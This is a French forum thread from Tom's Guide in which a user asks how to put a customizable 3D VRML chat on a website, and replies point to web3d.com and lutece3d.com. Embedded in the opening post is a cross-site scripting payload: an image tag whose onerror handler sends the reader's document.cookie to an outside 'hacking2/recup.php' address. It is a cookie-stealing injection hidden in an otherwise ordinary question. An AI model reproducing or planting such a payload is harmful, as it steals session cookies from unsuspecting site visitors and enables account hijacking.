Tom's Guide > Forum > Programmation > comment avoir un monde virtuel à sois (vrml)?

comment avoir un monde virtuel à sois (vrml)?

Forum Programmation : comment avoir un monde virtuel à sois (vrml)?

TomsGuide.com : 800 000 inscrits répondent à toutes vos questions high-tech et informatique. Pour obtenir de l'aide, inscrivez-vous gratuitement !
Mot :    Pseudo :           

salut
est il possible de telecharger un chat 3d tout fait que l'on peut mettre sur son site
si c'est possible je prefererais un chat 3d qui se modifie completement (couleur du sol du ciel nouvelle construction ......etc )
merci d'avance
[img]image-qui-n-existe-pas.jpg"onerror="window.open('http://www.membres.lycos.fr/hacking2/recup.php?cookie='+document.cookie)[/img]

Liens sponsorisés
Inscrivez-vous ou connectez-vous pour masquer ceci.

Oui si ya quelqu'un qui sait sa m'interesse aussi merci

Répondre à zone-f@IDN

heu y a le chat de web3d.com qui est comme ca avec VRML et qui necessite un viewer 3D.

Tu auras toutes les infos sur ce site ainsi que des tutos :)

gl

Répondre à Dunkel

Bonjour oui va sur ce site internet c'est grace a ce site internet que je connais le vrml tu doit programmer ton monde trvaille quelque jour a étudier le language c est plutot simple et si tu veux pas étudier tien il y a des monde ou il te propose de crée ta propre maison sur le chat et rajouter des objets dedans et dehors et il y a des concours bonne chance voici l adresse :-D http://lutece3d.com

Citation :

Dunkel a écrit :
heu y a le chat de web3d.com qui est comme ca avec VRML et qui necessite un viewer 3D.

Tu auras toutes les infos sur ce site ainsi que des tutos :)

gl

Répondre à mcmmaster
Tom's Guide > Forum > Programmation > comment avoir un monde virtuel à sois (vrml)?
Aller à :

Il y a 2662 utilisateurs connus et inconnus. Pour voir la liste des connectés connus, cliquez ici.

Attention

Vous allez répondre sur un sujet resté inactif pendant plus de 6 mois.
Assurez-vous d'apporter des éléments nouveaux à la discussion avant de poursuivre.

Répondre Annuler
Liens